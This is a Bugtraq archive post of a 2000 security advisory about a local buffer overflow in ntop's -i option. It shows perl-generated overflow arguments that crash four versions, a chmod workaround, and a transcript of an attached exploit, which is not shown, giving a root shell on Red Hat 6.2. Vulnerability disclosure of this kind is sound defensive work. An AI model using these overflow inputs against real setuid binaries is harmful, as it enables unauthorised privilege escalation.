Bugtraq mailing list archives

Security Advisory - ntop local buffer overflow vulnerability (fwd)

From: BAILLEUX Christophe <cb () GROLIER FR>
Date: Tue, 24 Oct 2000 13:42:03 +0200

Subject         : ntop local buffer overflow vulnerability
Author          : Christophe BAILLEUX (cb () grolier fr)
Plateforms      : *nix
Test version    : ntop 1.1, ntop 1.2.a7, ntop 1.3.1, ntop 1.3.2



I.      Problem

All ntop versions are vulnerabled to local buffer overflow attack in there
-i options.
Ntop must be owned by root with a setuid bit for the attacker to gain
root privileges.



II.     Demo


a) ntop 1.1


tshaw:/home/cb/ntop-1.1/$ ./ntop -i `perl -e 'print "A"x208'`
ntop v.1.1 MT [i686-pc-linux-gnu] listening on
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Host      Act   -Rcvd-      Sent       TCP     UDP  ICMP
Segmentation fault
tshaw:/home/cb/SRCAUDIT/ntop-1.1$


b) ntop 1.2a7

tshaw:/home/cb/ntop-1.2a7$ ./ntop -i `perl -e 'print "A"x109'`
Segmentation fault
tshaw:/home/cb/SRCAUDIT/ntop-1.2a7$



c) ntop 1.3.1


tshaw:/home/cb/ntop-1.3.1$ ./ntop -i `perl -e 'print "A"x271'`
Segmentation fault
tshaw:/home/cb/SRCAUDIT/ntop-1.3.1$


d) ntop 1.3.2

tshaw:/home/cb/ntop-1.3.2$ ./ntop -i `perl -e 'print "A"x2835'`

24/Oct/2000:12:32:16 ntop v.1.3.2 MT [i686-pc-linux-gnu] (08/11/00
07:04:32 PM build)
24/Oct/2000:12:32:16 Listening on
[AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]
24/Oct/2000:12:32:16 Copyright 1998-2000 by Luca Deri <deri () ntop org>
24/Oct/2000:12:32:16 Get the freshest ntop from http://www.ntop.org/
24/Oct/2000:12:32:16 Initialising...
Segmentation fault
tshaw:/home/cb/ntop-1.3.2$




III.    Workaround

chmod ug-s path/to/ntop

ntop team has been informed (http://www.ntop.org).






IV.     Exploit (See Attachment)


Tested on redhat 6.2 (Zoot) where ntop is installed by default with the
bit setuid root


[cb@nux cb]$ cat /etc/redhat-release
Red Hat Linux release 6.2 (Zoot)
[cb@nux cb]$ rpm -qf /sbin/ntop
ntop-1.1-1
[cb@nux cb]$ id
uid=535(cb) gid=535(cb) groups=535(cb)
[cb@nux cb]$ ./expl

ntop v.1.1 MT [i586-pc-linux-gnu] listening on
..............................

Host        Act   -Rcvd-      Sent    TCP   UDP ICMP
bash#
bash# id
uid=0(root) gid=535(cb) egid=3(sys) groups=535(cb)
bash# exit
[cb@nux cb]$



Greetings to kalou, Bdev, cleb, dv, PullthePlug Community and all i
forget.
Thanks Teuk for leating me use his server, for do and test ntop redhat
6.2 exploit :)

Regards,


--
BAILLEUX Christophe - Network & System Security Engineer
Grolier Interactive Europe-OG/CS
Voice:+33-(0)1-5545-4789 - mailto:cb () grolier fr

Attachment: ntop-1.1-1-ex.c
Description:

Current thread:

Security Advisory - ntop local buffer overflow vulnerability (fwd) BAILLEUX Christophe (Oct 25)
- Re: Security Advisory - ntop local buffer overflow vulnerability BAILLEUX Christophe (Oct 26)